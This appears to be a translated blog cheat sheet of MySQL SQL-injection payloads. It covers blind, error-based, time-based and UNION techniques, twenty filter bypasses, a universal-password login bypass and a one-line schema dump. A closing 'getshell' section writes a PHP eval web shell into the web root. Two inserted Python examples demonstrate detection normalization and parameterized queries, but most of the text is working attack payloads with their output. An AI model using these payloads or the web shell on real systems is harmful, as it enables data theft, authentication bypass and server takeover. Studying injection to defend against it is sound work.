Common injection techniques
1. Boolean-based blind
2. Error-based
3. AND/OR time-based blind
4. UNION query

Common functions
Checking for file read/write privileges
Filter bypasses
1. Not enough columns
2. Spaces filtered
3. "from x" filtered
4. Commas filtered
5. Greater-than / less-than filtered
6. Arithmetic comparison when spaces are filtered
7. and / or / xor / not filtered
8. Universal password: or/and precedence
9. Quotes filtered
10. "tables" filtered
11. "select" filtered
12. "union" filtered

13. "=" filtered
14. updatexml and extractvalue filtered

15. Combined filter: preg_match('/(and|or|union|where)/i',$id)
16. Combined filter: preg_match('/(and|or|union|where|limit)/i', $id)
17. Combined filter: preg_match('/(and|or|union|where|limit|group by)/i', $id)
18. Combined filter: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
19. "column" filtered
20. order by injection
Tips
1. Dump all tables and columns
2. Use errors to discover databases, tables and columns
3. getshell
Common injection techniques
1. Boolean-based blind

left() usage: left(str, length), i.e. left(string to cut, number of leading characters to keep)

mysql> select * from test where id=1 and left(version(),1)=8;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3

ascii() converts a character to its ASCII code
substr(string string, num start, num length);

substr(): string is the input string, start is the starting position, length is the number of characters.

mysql> select * from test where id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2. Error-based

mysql> select * from test where id=1 union select version(),@@version_compile_os,floor(rand(0)*2)x from information_schema.character_sets group by x;
id     | username | password
1      | admin    | 21232f297a57a5a743894a0e4a801fc3
8.0.12 | osx10.13 | 0
8.0.12 | osx10.13 | 1

3. AND/OR time-based blind

mysql> select * from test where id=1 and sleep(2);
id | username | password

Time: 2.053s

mysql> select * from test where id=1 or sleep(2);
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3

Time: 6.226s
4. UNION query

mysql> select * from test where id=1 union select * from test;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb

Common functions
concat: joins several strings into one string
group_concat: returns a string built by concatenating the values of a group
concat_ws: concat with separator, the first argument is the separator placed between the others
system_user(): system user name
user(): user name
current_user: current user name
session_user(): user name used for the database connection
database(): database name
version(): database version
load_file(): reads a local file
@@datadir: data directory path (MySQL 5.0 and above)
@@basedir: installation path
@@version_compile_os: operating system
@@HOSTNAME: host name
Checking for file read/write privileges
Read

mysql> select * from test where id=1 and (select count(*) from mysql.user)>0
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3

Write

mysql> select * from test where id=1 and (select count(file_priv) from mysql.user)>0
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 and (select count(file_priv) from mysql.user)<0
id | username | password

Filter bypasses
1. Not enough columns
mysql> select * from test where id=1 union select null,floor(rand(0)*2)x from information_schema.tables group by x;
(1222, u'The used SELECT statements have a different number of columns')

floor() returns the largest integer less than or equal to its argument.

mysql> select * from test where id=1 union select null,null,floor(rand(0)*2)x from information_schema.tables group by x; -- pad with null or any other value
id     | username | password
1      | admin    | 21232f297a57a5a743894a0e4a801fc3
<null> | <null>   | 0
<null> | <null>   | 1

2. Spaces filtered

mysql> select(username)from(test)where(id)=1;
username
admin
mysql> select * from test where id=1E0union select 1,2,3 -- 1E0 is the floating-point literal 1.0
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
1  | 2        | 3
mysql> select*from/**/test/**/where/**/id=1;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select*from`test`where`id`=2;
id | username | password
2  | root     | 63a9f0ea7bb98050796b649e85481845
mysql> select * from test where id=1 union select@1=@1,2,3;
id     | username | password
1      | admin    | 21232f297a57a5a743894a0e4a801fc3
<null> | 2        | 3
mysql> select * from test where id=1 union select@1,2,3;
id     | username | password
1      | admin    | 21232f297a57a5a743894a0e4a801fc3
<null> | 2        | 3

Note: a single @ denotes a user-defined variable, @@ a system variable
In PHP, \s matches 0x09, 0x0a, 0x0b, 0x0c, 0x0d and 0x20
09: Horizontal Tab
0A: New Line
0B: Vertical Tab
0C: New Page
0D: Carriage Return
A0: in MySQL %a0 is a whitespace character and can stand in for a space
20: Space
a0: space
2B: +
2D: -
7E: ~
21: !
40: @
SQLite3: 0A 0D 0C 09 20
MySQL5: 09 0A 0B 0C 0D A0 20
PostgreSQL: 0A 0D 0C 09 20
Oracle 11g: 00 0A 0D 0C 09 20
MSSQL: 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
3. "from x" filtered

mysql> select * from. test;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb

4. Commas filtered
Use mid(user() from 1 for 1) or substr(user() from 1 for 1)

mysql> select * from test where id=1 and (select ascii(substr(user() from 1 for 1)))=114;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 and (substr(user() from 1 for 1))='r';
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test limit 1 offset 2;
id | username | password
3  | test     | 098f6bcd4621d373cade4e832627b4f6
mysql> select * from ((select 1)A join (select 2)B join ((select username from test where id=2))D); -- equivalent to UNION SELECT 1,2,3
1 | 2 | username
1 | 2 | root

5. Greater-than / less-than filtered
greatest(x,y) returns the larger of x and y; not-equal (!=) can of course be used as well

mysql> select greatest(ascii(mid(user(),1,1)),120)=120;
greatest(ascii(mid(user(),1,1)),120)=120
1

The above tests the ASCII code of the first character of user() against 120: if the final result is 120 it returns true (1), otherwise false (0), so a script can enumerate the value.
6. Arithmetic comparison when spaces are filtered

mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=110);
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=114);
id | username | password
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=114);
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=115);
id | username | password

Multiplication and division work just as well.
7. and / or / xor / not filtered
and=&& or=|| xor=| not=! Note that some characters must be URL-encoded when typed into a browser, e.g. && becomes %26%26

mysql> select * from test where id=1||(ascii(substr(database(),1,1))=116);
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=116);
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=115);
id | username | password
Bypasses: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
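Seen from the defending side, the whitespace table in item 2 and the operator synonyms in item 7 are exactly what a detection rule has to canonicalize before matching anything. This added Python example (not code from the original post) rewrites a request parameter the way MySQL's lexer reads it and compares a raw keyword blacklist with the same check run after normalization; the sample parameters are constructed from payload forms shown on this page.

```python
import re
from urllib.parse import unquote_to_bytes

# Bytes MySQL's lexer treats as whitespace (the table in item 2). PHP's \s
# stops at 0x20 and never matches 0xA0, which is the gap the %a0 trick uses.
MYSQL_WS = rb"[\x09\x0a\x0b\x0c\x0d\x20\xa0]+"
KEYWORDS = re.compile(rb"\b(and|or|union|where|select|limit|group by)\b")

def normalize(raw: bytes) -> bytes:
    """Rewrite a request parameter into the form MySQL actually parses."""
    s = unquote_to_bytes(raw)                         # %26%26 -> &&, %a0 -> 0xA0
    s = re.sub(rb"/\*.*?\*/", b" ", s, flags=re.S)    # /**/ is a token separator
    s = s.replace(b"&&", b" and ").replace(b"||", b" or ")   # item 7 synonyms
    s = re.sub(rb"(?<=\d)(?=[a-zA-Z])", b" ", s)      # 1E0union -> 1 E0 union
    s = re.sub(MYSQL_WS, b" ", s)                     # any whitespace byte -> one space
    return s.strip().lower()

def naive_hit(raw: bytes) -> bool:
    """The item-15 blacklist applied to the raw parameter, as that filter does."""
    return re.search(rb"(and|or|union|where)", raw, re.I) is not None

def normalized_hit(raw: bytes) -> bool:
    """The same keyword idea, but evaluated after canonicalization."""
    return KEYWORDS.search(normalize(raw)) is not None

# Constructed request parameters, built from the payload forms listed on this page.
SAMPLES = [
    b"1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)",
    b"1 || (select user from users limit 1) = 'admin'",
    b"select%a0*%a0from/**/test/**/where/**/id=1",
    b"1E0union select 1,2,3",
]

if __name__ == "__main__":
    print("raw   norm  normalized form")
    for p in SAMPLES:
        print(f"{naive_hit(p)!s:5} {normalized_hit(p)!s:5} {normalize(p)!r}")
```

The first two samples pass the raw blacklist untouched and are only caught once `&&` and `||` have been mapped back to the keywords they stand for.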

8. Universal password: or/and precedence
mysql> select * from test where username='nouser' or '1'='1' or '1'='1' -- - and password='123';

id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb
mysql> select * from test where username='nouser' and password='123' or '1'='1';
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb
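Why the second query above returns every row: and binds more tightly than or, so the trailing or '1'='1' is evaluated against the whole username-and-password conjunction. This added Python example (not code from the original post) reproduces both login bypasses against a constructed in-memory SQLite copy of the test table and shows that binding the values as parameters removes the problem; SQLite's operator precedence and `--` comment handling match MySQL's for these two inputs.

```python
import sqlite3

# Constructed in-memory copy of the page's test table (two of its rows).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table test(id integer, username text, password text)")
    con.executemany("insert into test values(?,?,?)", [
        (1, "admin", "21232f297a57a5a743894a0e4a801fc3"),
        (2, "root", "63a9f0ea7bb98050796b649e85481845"),
    ])
    return con

def login_concat(con: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: the WHERE clause is built by string concatenation, so an
    'or' or a '--' inside the input becomes part of the query grammar."""
    sql = f"select id from test where username='{username}' and password='{password}'"
    return sorted(r[0] for r in con.execute(sql))

def login_param(con: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened: the driver binds both values; neither precedence nor comments
    in the input can alter the statement that was prepared."""
    sql = "select id from test where username=? and password=?"
    return sorted(r[0] for r in con.execute(sql, (username, password)))

if __name__ == "__main__":
    db = make_db()
    # The two inputs from the page: a comment that drops the password check,
    # and an 'or' that wins over the 'and' through precedence.
    for user, pw in [("nouser' or '1'='1' or '1'='1' -- -", "123"),
                     ("nouser", "123' or '1'='1")]:
        print("concat:", login_concat(db, user, pw), "param:", login_param(db, user, pw))
```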

9. Quotes filtered

mysql> select * from test where username=0x61646d696e;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where username=CHAR(97, 100, 109, 105, 110);
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3

10. "tables" filtered

mysql> select table_name from information_schema.partitions where table_schema=database();
TABLE_NAME
test
mysql> select table_name from information_schema.statistics where table_schema=database();
TABLE_NAME
test
mysql> select table_name from information_schema.table_constraints where table_schema=database();
table_name
test
mysql> select table_name from information_schema.KEY_COLUMN_USAGE where table_schema=database();
table_name
test

11. "select" filtered
Boolean or time-based blind injection suffices; see also item 6

mysql> select * from test where id=1 and ascii(substr(database(),1,1))=116;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1);
id | username | password

Time: 5.081s
12. "union" filtered
Blind injection or guessing through subqueries; writing a script is the practical route

mysql> select * from test where id=2 and (select username from test where id=1)='admin';
id | username | password
2  | root     | 63a9f0ea7bb98050796b649e85481845
13. "=" filtered
Use like, rlike or regexp, or use < or >
mysql> select * from test where id=1 union select 1,2,table_name from information_schema.tables where table_name between 0x61 and 0x7a;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
1  | 2        | CHARACTER_SETS
1  | 2        | COLLATION_CHARACTER_SET_APPLICABILITY
1  | 2        | COLLATIONS
1  | 2        | COLUMN_PRIVILEGES
... (the same works with between char(97) and char(122)) ...
mysql> select * from test where id=1 and 1 like 2;
id | username | password
mysql> select * from test where id=1 and 1 like 1;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
mysql> select 1,2,table_name from information_schema.tables where table_name between 'u' and 'v' limit 0,1;
1 | 2 | TABLE_NAME
1 | 2 | USER_PRIVILEGES
mysql> select 1,2,table_name from information_schema.tables where table_name like 'u%' limit 1 offset 1;
1 | 2 | TABLE_NAME
1 | 2 | users
mysql> select 1,2,table_name from information_schema.tables where table_name > 'u' and table_name < 'v' limit 10,1;
1 | 2 | TABLE_NAME
1 | 2 | user_summary

14. updatexml and extractvalue filtered
mysql> select * from users where id=1 AND polygon((select * from(select * from(select user())a)b));
ERROR 1367 (22007): Illegal non geometric '(select b.user() from (select 'root@localhost' AS user() from dual) b)' value found during parsing

mysql> select * from users where id=1 AND GeometryCollection((select * from (select * from(select version())a)b));
ERROR 1367 (22007): Illegal non geometric '(select b.version() from (select '5.5.44-0ubuntu0.14.04.1' AS version() from dual) b)' value found during parsing

mysql> select * from users where id=1 AND multipoint((select * from(select * from(select @@basedir)a)b));
ERROR 1367 (22007): Illegal non geometric '(select b.@@basedir from (select '/usr' AS @@basedir from dual) b)' value found during parsing

mysql> select * from users where id=1 AND multilinestring((select * from(select * from(select database())a)b));
ERROR 1367 (22007): Illegal non geometric '(select b.database() from (select 'test' AS database() from dual) b)' value found during parsing

mysql> select * from users where id=1 AND LINESTRING((select * from(select * from(select @@version_compile_os)a)b));
ERROR 1367 (22007): Illegal non geometric '(select b.@@version_compile_os from (select 'debian-linux-gnu' AS @@version_compile_os from dual) b)' value found during parsing

mysql> select * from users where id=1 AND multipolygon((select * from(select * from(select @@datadir)a)b));
ERROR 1367 (22007): Illegal non geometric '(select b.@@datadir from (select '/var/lib/mysql/' AS @@datadir from dual) b)' value found during parsing

mysql> select * from users where id=1 and exp(~(select * from (select user()) a));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

mysql> select * from users where id=1 union select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
ERROR 1060 (42S21): Duplicate column name '5.5.44-0ubuntu0.14.04.1'

mysql> select * from users where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.5.44-0ubuntu0.14.04.11' for key 'group_key'

15. Combined filter: preg_match('/(and|or|union|where)/i',$id)
These were essentially covered above.

1 || updatexml(1,concat(0x7e,database(),0x7e),1) -- if the output exceeds the length limit, combine with substr
1 %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))
1 || (select user from users limit 1) = 'admin'
1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)
1 || ascii(substr(database(),1,1))=115
16. Combined filter: preg_match('/(and|or|union|where|limit)/i', $id)

mysql> select * from test where id=2||(select username from test group by id having id = 1) = 'admin';
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb

For error-based or blind injection the main problem is the missing limit; having takes its place.
17. Combined filter: preg_match('/(and|or|union|where|limit|group by)/i', $id)

mysql> select * from test where id=2||(select substr(group_concat(username),1,5) from test) = 'admin';
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3
2  | root     | 63a9f0ea7bb98050796b649e85481845
3  | test     | 098f6bcd4621d373cade4e832627b4f6
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb
18. Combined filter: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
mysql> select * from test where id=-2||substr(username,1,5) = 0x61646d696e;
id | username | password
1  | admin    | 21232f297a57a5a743894a0e4a801fc3

Update
19. "column" filtered
When the table name is known, a join error reveals the column names one at a time

mysql> select * from users where id=1 union select 1,2,(select * from (select * from users a join users b) c);
ERROR 1060 (42S21): Duplicate column name 'id'

mysql> select * from users where id=1 union select 1,2,(select * from (select * from users a join users b using(id)) c);
ERROR 1060 (42S21): Duplicate column name 'username'

mysql> select * from users where id=1 union select 1,2,(select * from (select * from users a join users b using(id,username)) c);
ERROR 1060 (42S21): Duplicate column name 'password'

20. order by injection
Error-based

mysql> select * from users order by id=rand(updatexml(1,concat(0x7e,database(),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: '~test~'

mysql> select * from users order by id=1 and updatexml(1,concat(0x7e,database(),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~test~'

Based on a difference in the returned row order

mysql> select * from users order by id=1 and ascii(substr((select database()),1,1))>1;
id | username | password                         | address
2  | root     | 63a9f0ea7bb98050796b649e85481845 | baidu.com
3  | test     | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net
1  | admin    | 21232f297a57a5a743894a0e4a801fc3 | localhost
mysql> select * from users order by id=1 and ascii(substr((select database()),1,1))<1;
id | username | password                         | address
1  | admin    | 21232f297a57a5a743894a0e4a801fc3 | localhost
2  | root     | 63a9f0ea7bb98050796b649e85481845 | baidu.com
3  | test     | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net

Time-based

mysql> select * from users order by id=1 and if(1=1,sleep(2),1);
id | username | password                         | address
1  | admin    | 21232f297a57a5a743894a0e4a801fc3 | localhost
2  | root     | 63a9f0ea7bb98050796b649e85481845 | baidu.com
3  | test     | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc
4  | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net

4 rows in set (2.01 sec)
Tips
'=' <--> 'like' <--> 'in' --> 'regexp' <--> 'rlike' --> '>' <--> '<'
1. Dump all tables and columns
(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
2. Use errors to discover databases, tables and columns
mysql> select * from users where username='admin' and polygon(username);
(1367, u"Illegal non geometric 'test.users.username' value found during parsing")

3. getshell
show variables like '%plugin%';
show variables like "secure_file_priv";
show variables like '%general_log%';
use mysql;
Drop TABLE IF EXISTS shell;
Create TABLE shell (shell text NOT NULL);
Insert INTO shell (shell) VALUES('<?php @eval($_POST[1]);?>');
select shell from shell into outfile '/var/www/html/1.php';
Drop TABLE IF EXISTS shell;
If stacked injection is available, directly: id=1';set global general_log = on;

Original article:

http://04z.net/archives/2030ee36.html